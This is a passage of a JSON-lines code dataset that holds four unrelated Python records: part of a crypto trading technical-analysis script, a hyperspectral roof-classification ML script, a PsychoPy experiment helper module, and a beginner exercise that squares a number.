Client.KLINE_INTERVAL_2HOUR,\n # Client.KLINE_INTERVAL_4HOUR, Client.KLINE_INTERVAL_6HOUR, Client.KLINE_INTERVAL_8HOUR,\n # Client.KLINE_INTERVAL_12HOUR,\n # Client.KLINE_INTERVAL_1DAY, Client.KLINE_INTERVAL_3DAY]\n\n tickers = [Client.KLINE_INTERVAL_12HOUR]\n\n print(\"bullish & tradeable assets\")\n bullish_tradeable_map = {}\n for ticker in tickers:\n aggregate_assets(bullish_tradeable_map, get_tradeable_and_bullish_assets(markets, ticker), ticker)\n\n bullish_tradeable_list = post_proc(bullish_tradeable_map)\n print_assets(bullish_tradeable_list)\n\n print(\"bullish assets\")\n bullish_map = {}\n for ticker in tickers:\n aggregate_assets(bullish_map, get_bullish_assets(markets, ticker), ticker)\n\n bullish_list = post_proc(bullish_map)\n print_assets(bullish_list)\n\n print(\"tradeable assets\")\n tradeable_map = {}\n for ticker in tickers:\n aggregate_assets(tradeable_map, get_tradeable_assets(markets, ticker), ticker)\n\n tradeable_list = post_proc(tradeable_map)\n print_assets(tradeable_list)\n\n\n#\n# markets = 
binance.get_all_btc_currencies(exclude_markets)\n# ticker = Client.KLINE_INTERVAL_30MINUTE\n# tradeable_assets_30min = get_tradeable_assets(markets, ticker)\n#\n# markets = binance.get_all_btc_currencies(exclude_markets)\n# ticker = Client.KLINE_INTERVAL_4HOUR\n# tradeable_assets_4h = get_tradeable_assets(markets, ticker)\n#\n# markets = binance.get_all_btc_currencies(exclude_markets)\n# ticker = Client.KLINE_INTERVAL_6HOUR\n# tradeable_assets_6h = get_tradeable_assets(markets, ticker)\n#\n# markets = binance.get_all_btc_currencies(exclude_markets)\n# ticker = Client.KLINE_INTERVAL_12HOUR\n# tradeable_assets_12h = get_tradeable_assets(markets, ticker)\n\n\ndef is_magnitude_gt(_val, _m):\n return np.log10(_val) > _m\n\n\ndef get_most_volatile_market():\n _filename = \"exclude-markets\"\n _ticker = Client.KLINE_INTERVAL_3MINUTE\n _volatile_markets = {}\n _exclude_markets = {}\n _window = \"1 days ago\"\n if path.isfile(key_dir + _filename + \".pkl\"):\n _exclude_markets = get_pickled(key_dir, _filename)\n else:\n _exclude_markets[_ticker] = exclude_markets\n _markets = binance_obj.get_all_btc_currencies(_exclude_markets[_ticker])\n _window = \"1 day ago\"\n for _market in _markets:\n try:\n _klines = get_klines(_market, _ticker, _window)\n _closes = get_closes(_klines)\n if _market == 'COCOSBTC':\n i = 1\n if is_magnitude_gt(_closes[-1], -6.5):\n _std = get_std_last(_closes, 1)\n _volatile_markets[_market] = _std / _closes[-1]\n except Exception:\n print(f\"No data for market : {_market}\")\n if _ticker in _exclude_markets:\n _exclude_markets[_ticker].append(_market)\n else:\n _exclude_markets[_ticker] = [_market]\n _s = sorted(_volatile_markets, key=_volatile_markets.get, reverse=True)\n save_to_file(key_dir, \"exclude-markets\", _exclude_markets)\n i = 1\n\n\ndef is_falling_wedge_0(_closes):\n _max_val, _index_max_val = find_first_maximum(_closes, 5)\n _max_val0, _index_max_val0 = find_first_maximum(_closes[:-_index_max_val], 5)\n _max_val2, _index_max_val2 = find_first_maximum(_closes[-_index_max_val:], 3)\n _min_va11, _index_min_val1 = find_first_minimum(_closes[-_index_max_val:], 3)\n _min_val, _index_min_val2 = find_first_minimum(_closes[-_index_max_val:-_index_max_val2][::-1], 3)\n _index_min_val = _index_max_val2 + _index_min_val2 + 1\n _magnitude = get_magnitude(_index_max_val, _max_val)\n _slope_max = slope(-_index_max_val, _max_val * np.power(10, _magnitude), -_index_max_val2,\n _max_val2 * np.power(10, _magnitude))\n _slope_min = slope(-_index_min_val, _min_val * np.power(10, _magnitude), -_index_min_val1,\n _min_va11 * np.power(10, _magnitude))\n\n _b_max = bias(-_index_max_val, _max_val * np.power(10, _magnitude), -_index_max_val2,\n _max_val2 * np.power(10, _magnitude))\n _b_min = bias(-_index_min_val, _min_val * np.power(10, _magnitude), -_index_min_val1,\n _min_va11 * np.power(10, _magnitude))\n\n _checked_max = check_wedge(_slope_max, _b_max, range(-_index_max_val, 0),\n _closes[-_index_max_val:] * np.power(10, _magnitude))\n _checked_min = check_wedge(_slope_min, _b_min, range(-_index_max_val, 0),\n _closes[-_index_max_val:] * np.power(10, _magnitude), True)\n\n _max0_cond = _max_val0 * np.power(10, _magnitude) <= -_slope_max * _index_max_val0 + _b_max\n\n _at1 = np.math.atan(_slope_max)\n _at2 = np.math.atan(_slope_min)\n _deg1 = np.math.degrees(_at1)\n _deg2 = np.math.degrees(_at2)\n _diff_deg = _deg2 - _deg1\n _wedge_formed = 0 < _diff_deg < 60.0\n\n plt.subplot2grid((1, 1), (0, 0))\n plt.plot(-_index_max_val, _max_val * np.power(10, _magnitude), 'g^')\n 
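# mark the remaining extrema and draw the two fitted wedge trend lines over the recent closes\n 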
plt.plot(-_index_max_val2, _max_val2 * np.power(10, _magnitude), 'g^')\n plt.plot(-_index_min_val, _min_val * np.power(10, _magnitude), 'bs')\n plt.plot(-_index_min_val1, _min_va11 * np.power(10, _magnitude), 'bs')\n\n t = range(-_index_max_val, 0)\n y1 = _slope_max * t + _b_max\n y2 = _slope_min * t + _b_min\n\n plt.plot(t, y1)\n plt.plot(t, y2)\n plt.plot(t, np.array(_closes[-_index_max_val:]) * np.power(10, _magnitude))\n\n plt.show()\n i = 1\n\n\ndef is_bull_flag0(_klines):\n _closes = np.array(list(map(lambda _x: float(_x.closing), _klines)))\n _opens = np.array(list(map(lambda _x: float(_x.opening), _klines)))\n _high = list(map(lambda _x: float(_x.highest), _klines))\n _low = list(map(lambda _x: float(_x.lowest), _klines))\n\n _max_val, _index_max_val = find_first_maximum(_closes, 5)\n\n _rsi = relative_strength_index(_closes)\n\n _r_max_val_max, _r_max_ind = find_first_maximum(_rsi, 10)\n _r_min_val_max, _r_min_ind0 = find_first_minimum(_rsi[:-_r_max_ind], 10)\n _r_min_ind = _r_max_ind + _r_min_ind0\n _rsi_mean = np.mean(_rsi[-_r_min_ind:])\n _is_bullish = _rsi_mean > 58.0\n\n _rev_min_val, _rev_min_ind0 = find_first_minimum(_closes[-_r_max_ind:][::-1], 10)\n _rev_min_ind = len(_closes[-_r_max_ind:]) - _rev_min_ind0\n _rev_max_val, _rev_max_ind0 = find_first_maximum(_closes[-_rev_min_ind:][::-1], 10)\n _rev_max_ind = _rev_min_ind - _rev_max_ind0 + 1\n _min_after_max_rev = np.mean(_closes[-_rev_max_ind:])\n _is_min_existing = _rev_min_val < _min_after_max_rev\n\n _rsi_last_avg = np.mean(_rsi[-10:])\n\n _ma50 = talib.MA(_closes, timeperiod=50)\n\n _c_m = np.mean(_closes[-10:])\n _r_m = np.mean(_ma50[-10:])\n _closes_above_ma50 = _c_m > _r_m\n\n return _is_bullish and _is_min_existing and _rsi_last_avg > 50.0 and _closes_above_ma50\n\n\ndef find_valuable_alts(_closes):\n _min_val = np.min(_closes)\n _max = np.max(_closes)\n return (_max-_min_val)/_min_val > 3\n\n\ndef check_ma_crossing(_ma, _highs, _n=5):\n for _i in range(_n):\n if _highs[-_i] > _ma[-_i] or (_ma[-_i] - _highs[-_i])/_highs[-_i] < 0.015 :\n return True\n return False\n\n\ndef find_zero(_data):\n for _i in range(len(_data)):\n if _data[len(_data) - _i - 1] > 0 > _data[len(_data) - _i - 2]:\n return _i\n return -1\n\n\ndef get_bid_price(_data, _lows):\n _ind = find_zero(_data)\n return np.min(_lows[len(_lows)-_ind-3:len(_lows)-_ind+1])\n\n\ndef main():\n # asset = Asset(exchange=\"binance\", name=\"LINK\", ticker=BinanceClient.KLINE_INTERVAL_1HOUR)\n # is_bullish_setup(asset)\n # analyze_markets()\n # get_most_volatile_market()\n\n asset = \"NEO\"\n market = \"{}BTC\".format(asset)\n # ticker = BinanceClient.KLINE_INTERVAL_30MINUTE\n ticker = BinanceClient.KLINE_INTERVAL_1HOUR\n time_interval = \"2 weeks ago\"\n\n # _klines = get_binance_klines(market, ticker, time_interval)\n _kucoin_ticker = \"1day\"\n # _klines = get_kucoin_klines(market, _kucoin_ticker, get_kucoin_interval_unit(_kucoin_ticker, 400))\n\n # _klines = get_klines(market, ticker, time_interval)\n\n # save_to_file(\"e://bin//data//\", \"klines-neo\", _klines)\n _klines = get_pickled('e://bin/data//', \"klines-neo\")\n _klines = _klines[:-3]\n\n _closes = np.array(list(map(lambda _x: float(_x.closing), _klines)))\n # find_valuable_alts(_closes)\n\n _is, _1 = is_second_golden_cross(_klines)\n\n bf = is_bull_flag(_klines)\n # fw0 = is_falling_wedge_0(_closes)\n fw = is_falling_wedge(_klines)\n\n macd, macdsignal, macdhist = talib.MACD(_closes, fastperiod=12, slowperiod=26, signalperiod=9)\n r = relative_strength_index(_closes)\n\n hl = is_higher_low(r, 45.0, 
33, -1)\n\n is_it = is_tradeable(_closes, r, macd, macdsignal)\n\n res0 = is_second_golden_cross(_klines[:-1])\n res = is_first_golden_cross(_klines)\n d = is_drop_below_ma50_after_rally(_klines)\n d1 = is_drop_below_ma200_after_rally(_klines)\n\n # _closes = np.array(list(map(lambda _x: float(_x[4]), _klines)))\n # _opens = np.array(list(map(lambda _x: float(_x[1]), _klines)))\n # _high = list(map(lambda _x: float(_x[2]), _klines))\n # _low = list(map(lambda _x: float(_x[3]), _klines))\n\n _closes = np.array(list(map(lambda _x: float(_x.closing), _klines)))\n _opens = np.array(list(map(lambda _x: float(_x.opening), _klines)))\n _high = list(map(lambda _x: float(_x.highest), _klines))\n _low = list(map(lambda _x: float(_x.lowest), _klines))\n\n bv, bi = bear_cross(_closes)\n _ind, _rel_ind, _diff = index_of_max_mas_difference(_closes)\n _res = []\n\n _r = compute_wider_interval(is_tilting, _klines)\n\n # for i in range(0, 24):\n # if i == 0:\n # _res.append(is_tilting(_closes))\n # else:\n # _res.append(is_tilting(_closes[:-i]))\n # _is_it = is_tilting(_closes)\n ## MACD\n\n # _out = is_second_golden_cross(_closes)\n # _first = is_first_golden_cross(_klines)\n #\n start = 0\n # stop = -5*60-30-32\n stop = -1\n # stop = -2650\n # save_to_file(\"/juno/\", \"klines-theta\", _klines[start:stop:1])\n\n # out = is_second_golden_cross(_closes[:stop])\n\n # t = is_tradeable(_closes, r, macd, macdsignal)\n\n # rsi_normal_cond = is_rsi_slope_condition(r, 45, 30, start, stop)\n # rsi_normal_tight = is_rsi_slope_condition(r, 30, 20, start, stop)\n # macd_normal_cond = is_macd_condition(macd, 45, start, stop)\n # divergence_ratio = is_signal_divergence_ratio(macd, macdsignal, 0.1, start, stop)\n # is_hl = is_higher_low(r, 45, start, stop)\n\n plt.subplot2grid((3, 1), (0, 0))\n plt.plot(macd[start:stop:1], 'blue', lw=1)\n plt.plot(macdsignal[start:stop:1], 'red', lw=1)\n # plt.plot(ema9[-wins:], 'red', lw=1)\n # plt.plot(macd[-wins:], 'blue', lw=1)\n\n # plt.subplot2grid((2, 1), (7, 0))\n #\n plt.plot(macd[start:stop:1] - macdsignal[start:stop:1], 'k', lw=2)\n plt.plot(np.zeros(len(macd[start:stop:1])), 'y', lw=2)\n # plt.axhline(y=0, color='b', linestyle='-')\n plt.subplot2grid((3, 1), (1, 0))\n plt.plot(r[start:stop:1], 'red', lw=1)\n\n ma40 = talib.MA(_closes, timeperiod=40)\n\n plt.subplot2grid((3, 1), (2, 0))\n plt.plot(ma40[start:stop:1], 'black', lw=1)\n plt.plot(_closes[start:stop:1], 'green', lw=1)\n\n _outcome = check_ma_crossing(ma40, _high)\n _zero = find_zero(macd[start:stop:1] - macdsignal[start:stop:1])\n\n _min_val, _min_ind = find_first_minimum(macd[start:stop:1] - macdsignal[start:stop:1], _window=1)\n\n _price = get_bid_price(macd[start:stop:1] - macdsignal[start:stop:1], _low)\n\n _p = get_setup_entry(_klines)\n\n plt.show()\n\n ma200 = talib.MA(_closes, timeperiod=200)\n # ma100 = talib.MA(_closes, timeperiod=100)\n ma50 = talib.MA(_closes, timeperiod=50)\n # ma20 = talib.MA(_closes, timeperiod=20)\n # ma7 = talib.MA(_closes, timeperiod=7)\n\n _ma200 = ma200[start:stop:1]\n _ma50 = ma50[start:stop:1]\n\n _mv, _mi = find_first_maximum(_ma200[-500:], 10)\n _mv2, _m2i = find_maximum_2(_ma200, 10)\n _minv, _mini = find_minimum_2(_ma200, 10)\n _maxv, _maxi = find_maximum_2(_ma200[-_mini:], 10)\n\n _cond1 = True\n if _ma200[-1] < _maxv:\n _cond1 = (_maxv - _minv) / _minv > 0.05\n\n _cond2 = (_ma200[-1] - _minv) / _minv > 0.05 and _mini > 500\n\n _bc_val, _bc_ind = bull_cross(_closes)\n\n _cond3 = _bc_ind < 10\n\n _fmax_v, _fmax_i = find_first_maximum(_ma200, 10)\n _fminv, _fmin_i0 = 
find_first_minimum(_ma200[:-_fmax_i], 10)\n _fmin_i = _fmax_i + _fmin_i0 - 1\n\n _fmax_v0, _fmax_i0_ = find_first_maximum(_ma200[:-_fmin_i], 10)\n _fmax_i0 = _fmax_i0_ + _fmin_i - 1\n\n _cond4_bear = not (_fmax_v - _fminv) / _fminv > 0.05 and _fmax_v - _fmax_v0 < 0\n\n _is = is_bull_cross_in_bull_mode(_closes)\n\n _first_gc = find_first_golden_cross(_ma50, _ma200, 50)\n\n below_ma = drop_below_ma(_ma200[-_first_gc[1]:], _closes[-_first_gc[1]:], 5)\n\n _max_high = find_local_maximum(_high[-_first_gc[1]:], 100)\n rally = (_max_high[0] - _first_gc[0]) / _first_gc[0] # 48, 82 %\n\n if rally > 0.5 and below_ma[1] > 0:\n i = 1\n\n k = 1\n # _max_200 = find_local_maximum(_ma200, 200) # first a long-period maximum\n # _min_200 = find_minimum_2(_ma200, 200) # first a long-period minimum\n # _max_200_1 = find_first_maximum(_ma200, 5) # second lower max\n # _min_200_1 = find_first_minimum(_ma200, 25) # first higher minimum\n #\n #\n # fall = (np.max(_high[-500:])-np.min(_low[-500:]))/np.max(_high[-500:]) # > 22%\n #\n # # _max_200_1 = find_first_maximum(_ma200, 5)\n #\n # _max = find_first_maximum(_ma50, 10)\n # _min = find_minimum(_ma50[-_max[1]:])\n #\n # _max_g = find_local_maximum(_ma50, 50)\n # _max_l = find_local_maximum(_ma50[-_max_g[1]:], 50)\n # _min_l = find_minimum(_ma50[-_max_g[1]:-_max_l[1]])\n # _min_low_l = find_minimum(_low[-_max_g[1]:-_max_l[1]])\n #\n # _min_l_ind = -_max_l[1] + _min_l[1]\n # _min_low_l_ind = -_max_l[1] + _min_low_l[1]\n # _max_l_ind = - _max_l[1]\n #\n # _max_high_l = find_local_maximum(_high[_min_l_ind:-_max_l[1]], 10)\n # _min_before_local_max = find_minimum(_low[_max_l_ind:])\n # rise = (_max_high_l[0]-_min_low_l[0])/_min_low_l[0] # > 15%\n # drop = (_max_high_l[0] - _min_before_local_max[0]) / _max_high_l[0] # > 10%\n # _ma50[-_max_l[1] - 44] - _min_l[0]\n # _ma200[:-_max[1] + 1] # first n elements until max element\n\n # _max_b = find_local_maximum(_ma200[-_max[1]:_min[1]], 10)\n\n # 43, 36, 20 %\n\n # if fall > 0.22 and rise > 0.15 and drop > 0.1 and np.abs(_max_l_ind) > 50:\n # i = 7\n\n _ma50 = ma50[start:stop:1]\n\n _max_50 = find_local_maximum(_ma50, 200) # first a long-period maximum\n _min_50 = find_minimum_2(_ma50, 200) # first a long-period minimum\n _max_50_1 = find_first_maximum(_ma50, 10) # second lower max\n _min_50_1 = find_first_minimum(_ma50, 25) # first higher minimum\n\n if _min_50[0] < _min_50_1[0] < _max_50_1[0] < _max_50[0] and _max_50[1] > _min_50[1] > _max_50_1[1] > _min_50_1[1]:\n aja = 1\n\n # HL_ma50_reversal_cond = _min_50[0] < _min_50_1[0] < _max_50_1[0] < _max_50[0] and _max_50[1] > _min_50[1] > _max_50_1[1] > _min_50_1[1]\n # min_after_max_low_variance = _min_200[0] < _max_200[0] and _max_200[1] > _min_200[1] and np.std(ma200[-200:]) / np.mean(ma200[-200:]) < 0.02\n # before_second_golden_cross_cond = _min_50[0] < _ma200[-_min_50[1]] and _max_50_1[0] > _ma200[-_max_50_1[1]] and _max_50_1[0] > _ma200[\n # -_max_50_1[1]] and _min_50_1[0] < _ma200[-_min_50_1[1]]\n\n # if _min_200[0] < _max_200[0] and _max_200[1] > _min_200[1] and np.std(ma200[-200:])/np.mean(ma200[-200:]) < 0.02:\n # aja = 1\n #\n # if _min_50[0] < _ma200[-_min_50[1]] and _max_50_1[0] > _ma200[-_max_50_1[1]] and _max_50_1[0] > _ma200[-_max_50_1[1]] and _min_50_1[0] < _ma200[-_min_50_1[1]]:\n # asd = 1\n\n # if HL_ma50_reversal_cond and min_after_max_low_variance and before_second_golden_cross_cond:\n # asd = 1\n\n # _ma200[:-_max[1] + 1] # first n elements until max element\n\n # _max_b_50 = find_local_maximum(_ma50[-_max_50[1]:_min_50[1]], 10)\n\n _curr_rsi = 
get_avg_last_2(r, stop)\n\n _curr_ma_50 = get_avg_last(ma50, stop)\n # _curr_ma_20 = get_avg_last(ma20, stop)\n # _curr_ma_7 = get_avg_last(ma7, stop)\n # _curr_ma_7_2 = get_avg_last_2(ma7, stop)\n\n # l1 = get_last(ma7, stop)\n # l2 = get_last_2(ma7, stop)\n\n # b = bullishness_2(_opens, _closes, ma100, ma50, ma20, stop)\n\n plt.subplot2grid((3, 1), (2, 0))\n # plt.plot(ma200[start:stop:1], 'green', lw=1)\n # plt.plot(ma50[start:stop:1], 'red', lw=1)\n\n plt.plot(_ma200, 'black', lw=1)\n plt.plot(_ma200[-_first_gc[1]:], 'green', lw=1)\n plt.plot(_ma50, 'red', lw=1)\n # plt.plot(_ma200[:-_min_200[1] + 1], 'green', lw=1)\n # plt.hlines(_min_200[0], 0, len(_ma200[:-_min_200[1] + 1]), 'black', lw=1)\n # plt.hlines(_max_200[0], 0, len(_ma200[:-_max_200[1] + 1]), 'black', lw=1)\n # plt.hlines(_max_200_1[0], 0, len(_ma200[:-_max_200_1[1] + 1]), 'black', lw=1)\n # plt.vlines(len(_ma200) - _min_200[1], np.min(_ma200[~np.isnan(_ma200)]), np.max(_ma200[~np.isnan(_ma200)]), 'black', lw=1)\n # plt.vlines(len(_ma200) - _max_200_1[1], np.min(_ma200[~np.isnan(_ma200)]), np.max(_ma200[~np.isnan(_ma200)]), 'black',\n # lw=1)\n # plt.vlines(len(_ma200) - _max_200[1], np.min(_ma200[~np.isnan(_ma200)]), np.max(_ma200[~np.isnan(_ma200)]), 'black', lw=1)\n # plt.plot(_ma200[:-_max_200[1] + 1], 'yellow', lw=1)\n\n # plt.plot(_ma50, 'black', lw=1)\n # plt.plot(_ma50[:-_min_50[1] + 1], 'green', lw=1)\n # plt.hlines(_min_50[0], 0, len(_ma50[:-_min_50[1] + 1]), 'black', lw=1)\n # plt.hlines(_max_50[0], 0, len(_ma50[:-_max_50[1] + 1]), 'black', lw=1)\n # plt.hlines(_max_50_1[0], 0, len(_ma50[:-_max_50_1[1] + 1]), 'black', lw=1)\n # plt.vlines(len(_ma50) - _min_50[1], np.min(_ma50[~np.isnan(_ma50)]), np.max(_ma50[~np.isnan(_ma50)]), 'black', lw=1)\n # plt.vlines(len(_ma50) - _max_50_1[1], np.min(_ma50[~np.isnan(_ma50)]), np.max(_ma50[~np.isnan(_ma50)]), 'black',\n # lw=1)\n # plt.vlines(len(_ma50) - _max_50[1], np.min(_ma50[~np.isnan(_ma50)]), np.max(_ma50[~np.isnan(_ma50)]), 'black', lw=1)\n # plt.plot(_ma50[:-_max_50[1] + 1], 'yellow', lw=1)\n\n # plt.plot(_ma50[:-_max_50_1[1] + 1], 'red', lw=1)\n # plt.plot(ma20[start:stop:1], 'blue ', lw=1)\n plt.show()\n # t = get_time_from_binance_tmstmp(_klines[-1][0])\n i = 1\n\n # ba = BuyAsset('ZRX', 0.00002520, 0.00002420, 0.00005520, 1)\n # take_profit(ba)\n i = 1\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sroziewski/trading-bot","sub_path":"ta.py","file_name":"ta.py","file_ext":"py","file_size_in_byte":33877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"307024476","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 7 10:42:17 2022\n\n@author: Stian\n\"\"\"\n\n# Shallow ML on spectral lib\n\n\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nimport spectral\nimport matplotlib.pyplot as plt\n\nimport spectral.io.envi as envi\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom matplotlib import cm\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\n\nfrom mycolorpy import colorlist as mcp\n\n\n# =============================================================================\n# Load data\n# =============================================================================\n\n\nspec_lib = 
envi.open(\"E:/M-DV-STeien/juni2021/04/hs/2021_04_stack30cm_roof_speclib_python.hdr\")\n#spec_lib = spectral.SpyFile.load(spec_lib)\nroofs = Image.open(\"E:/M-DV-STeien/databaseFKB2019/04/04_bygning_30cm.tif\")\nroofs = np.array(roofs)\n\ndf = pd.DataFrame(spec_lib.spectra, index=spec_lib.names, columns=spec_lib.bands.centers)\ndf.columns = np.floor(df.columns*1000)/1000\n\n# =============================================================================\n# Combine items with same strucutes, gray/red metal --> metal\n# =============================================================================\n# items_replace = {\"black ceramic\":\"ceramic\", \n# \"black concrete\":\"concrete\",\n# \"brown concrete\":\"concrete\",\n# \"red concrete\":\"concrete\",\n# \"dark metal\": \"metal\",\n# \"grayish metal\": \"metal\",\n# \"light metal\": \"metal\",\n# \"red metal\": \"metal\"}\n# df = df.rename(index=items_replace)\n\n\ndf[\"label\"] = df.index\n\ndf[\"label\"].replace(df.index.unique().to_numpy(), \n [i for i in range(len(df.index.unique()))], inplace= True)\n\n# =============================================================================\n# Load data HS \n# =============================================================================\n\nvnir_raw = spectral.open_image(\"E:/M-DV-STeien/juni2021/04/hs/VNIR30cm/2021_04_vnir30cm.hdr\")\nswir_raw = spectral.open_image(\"E:/M-DV-STeien/juni2021/04/hs/SWIR30cm/2021_04_swir30cm.hdr\")\n\n\n\nvnir = spectral.SpyFile.load(vnir_raw)\nswir = spectral.SpyFile.load(swir_raw)\n\nhs = np.dstack([vnir, swir])\n\nhs_small = hs[:, :, :]\nroofs = roofs[:, :]\nplt.imshow(np.dstack([hs_small[:,:,76],hs_small[:,:,46],hs_small[:,:,21]])/2500)\n\n# =============================================================================\n# Shallow ML pixelwise\n# =============================================================================\nsc = StandardScaler()\nsc.fit(df.drop(columns=[\"label\"]))\n\n\nknn = KNeighborsClassifier()\nknn.fit(df.drop(columns=[\"label\"]),\n df.label)\n\nlr = LogisticRegression(max_iter=200)\nlr.fit(df.drop(columns=[\"label\"]),\n df.label)\n\nsvc = SVC(verbose=1)\nsvc.fit(df.drop(columns=[\"label\"]),\n df.label)\n\nrf = RandomForestClassifier(verbose=1)\nrf.fit(df.drop(columns=[\"label\"]),\n df.label)\n\n# =============================================================================\n# Get right wavelength for all sets\n# =============================================================================\n\nX = pd.DataFrame(hs_small.reshape(hs_small.shape[0]*hs_small.shape[1],hs_small.shape[2]),\n columns=np.concatenate([vnir.bands.centers,swir.bands.centers]))\n\nX.columns = np.floor(X.columns)/1000\n#df.columns = np.concatenate(np.round(df.columns, 4), [\"label\"])\nX = X.loc[:,~X.columns.duplicated()]\n\nX = X[df.drop(columns=[\"label\"]).columns]\n\n# =============================================================================\n# Predict a small set\n# =============================================================================\ndef predict(estimator):\n roof = roofs.reshape(roofs.shape[0]*roofs.shape[1])\n test = X.to_numpy()[roof > 0.01]\n test_indx = np.argwhere(roof > 0.01)\n pred = estimator.predict(test)\n maps = np.zeros((hs_small.shape[0],\n hs_small.shape[1])).reshape(hs_small.shape[0]*hs_small.shape[1]) -1\n maps[test_indx.flatten()] = pred\n maps = maps.reshape(hs_small.shape[0], hs_small.shape[1])\n pred = maps\n return pred\n\npred = predict(lr)\n\npred = knn.predict(X).reshape(hs_small.shape[0],hs_small.shape[1])\npred = 
lr.predict(X).reshape(hs_small.shape[0],hs_small.shape[1])\npred = svc.predict(X).reshape(hs_small.shape[0],hs_small.shape[1])\npred = rf.predict(X).reshape(hs_small.shape[0],hs_small.shape[1])\n\n# =============================================================================\n# Show results\n# =============================================================================\n\npred[roofs < 0.01] = -1\n\n\nticks = [\"None\"]\nticks.extend(df.index.unique().to_list())\n\ncolors=mcp.gen_color(cmap=\"tab20\",n=6)\ncolormap = ListedColormap(colors)\n\n# NOTE: t and new_classes are built in the class-reduction block below, so run that block before this plot\nplt.imshow(t, cmap=colormap)\ncbar = plt.colorbar(ticks=[0,1,2,3,4,5])\ncbar.ax.set_yticklabels(new_classes.keys())\nplt.show()\n\n\n# =============================================================================\n# Reduce classes with earlier results\n# =============================================================================\n\nlabels = np.load(\"label.npy\")\nt = np.array(ticks)[labels] # a plain list cannot be indexed with an integer array\n \n\nclasses= {\"None\":\"None\",\n \"eternit\": \"eternit\",\n \"tar roofing paper\": \"tar roofing paper\",\n \"black ceramic\":\"ceramic\", \n \"black concrete\":\"concrete\",\n \"brown concrete\":\"concrete\",\n \"red concrete\":\"concrete\",\n \"dark metal\": \"metal\",\n \"grayish metal\": \"metal\",\n \"light metal\": \"metal\",\n \"red metal\": \"metal\"}\n\nfor i in classes:\n key = i\n value = classes[key]\n t[t == key] = value\n\nnew_classes = {\"None\": 0,\n \"ceramic\": 1,\n \"concrete\": 2,\n \"eternit\": 3,\n \"metal\": 4,\n \"tar roofing paper\":5}\n\nfor i in new_classes:\n key = i\n value = new_classes[key]\n t[t == key] = value\n\nt = t.astype(int) # astype returns a copy, so the result must be assigned\n\n","repo_name":"stianteien/M_DV_V2022","sub_path":"spectral_library/ml_speclib.py","file_name":"ml_speclib.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14585829567","text":"from code.load_data import read_text_from_file\nfrom code.check_exit import check_exit\nfrom psychopy import visual, gui, event, clock\nfrom os import listdir\nfrom os.path import join\n\n\ndef part_info(test=False):\n if test:\n info = {'Kod badanego': '', 'Wiek': '20', 'Płeć': 'M'}\n else:\n info = {'Kod badanego': '', 'Wiek': '', 'Płeć': ['M', \"K\"]}\n dict_dlg = gui.DlgFromDict(dictionary=info, title='Transrel werbalny')\n if not dict_dlg.OK:\n exit(1)\n info = {'Part_id': info['Kod badanego'],\n 'Part_age': info[\"Wiek\"],\n 'Part_sex': info[\"Płeć\"]}\n return info, f\"{info['Part_id']}_{info['Part_sex']}_{info['Part_age']}\"\n\n\ndef show_info(win, file_name, text_size, text_color, screen_res, insert=''):\n msg = read_text_from_file(file_name, insert=insert)\n msg = visual.TextStim(win, color=text_color, text=msg, height=text_size, wrapWidth=screen_res['width'])\n msg.draw()\n win.flip()\n key = event.waitKeys(keyList=['f7', 'return', 'space'])\n if key == ['f7']:\n raise Exception('Experiment finished by user on info screen! 
F7 pressed.')\n win.flip()\n\n\ndef show_image(win, file_name, size, key='f7'):\n image = visual.ImageStim(win=win, image=file_name, interpolate=True, size=size)\n image.draw()\n win.flip()\n clicked = event.waitKeys(keyList=[key, 'return', 'space'])\n if clicked == [key]:\n exit(0)\n win.flip()\n\n\ndef show_instructions(win, config, screen_res, block_type):\n for file in [f for f in listdir(\"messages\") if f.split(\"_\")[1] == block_type]:\n if file.endswith(\"txt\"):\n show_info(win, join('.', 'messages', file), text_color=config[\"text_color\"], text_size=config[\"text_size\"], screen_res=screen_res)\n elif file.endswith(\"PNG\") or file.endswith(\"png\"):\n show_image(win, join('.', 'messages', file), list(screen_res.values()))\n else:\n raise Exception(f\"{file} is incorrect instruction type. Use txt or png\")\n\n\ndef show_clock(clock_image, trial_clock, config):\n if config[\"show_clock\"] and trial_clock.getTime() > config[\"clock_show_time\"]:\n clock_image.draw()\n\n\ndef show_timer(timer, trial_clock, config):\n if config[\"show_timer\"]:\n timer.setText(config[\"trial_time\"] - int(trial_clock.getTime()))\n timer.draw()\n\n\ndef draw_stim_list(stim_list: list, flag: bool):\n for elem in stim_list:\n elem.setAutoDraw(flag)\n\n\ndef show_stim(stim, stim_time: int, trial_clock: clock.Clock, win: visual.Window):\n if stim_time == 0:\n return\n if stim is not None:\n stim.draw()\n win.callOnFlip(trial_clock.reset)\n win.callOnFlip(event.clearEvents)\n win.flip()\n while trial_clock.getTime() < stim_time:\n if stim is not None:\n stim.draw()\n check_exit()\n win.flip()\n\n win.flip()\n","repo_name":"cogscilab-experiment-y/Transrel_verbal","sub_path":"code/show_info.py","file_name":"show_info.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38090277583","text":"\"\"\"\n Write an algorithm that asks for a positive integer and returns the square of that number\n A square is the result of multiplying the number by itself\n We can go a little further and validate the input with a \"while\" loop\n\"\"\"\n\nNombrePositif = int(input(\"Please enter a positive integer: \"))\nwhile(NombrePositif<1):\n NombrePositif = int(input(\"Please enter a positive integer: \"))\nCarreNombre = (NombrePositif * NombrePositif)\n\ni=0\nNombreVerif=0\nprint(\"\\nThe step-by-step check of the result is as follows: \")\nwhile i < NombrePositif :\n i+=1\n NombreVerif += NombrePositif\n print(\"Iteration \",i,\" ->\", NombreVerif)\n\nprint(\"The total is therefore \",CarreNombre)","repo_name":"FlorentBch/Algo","sub_path":"Algo/1.5_Carre.py","file_name":"1.5_Carre.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 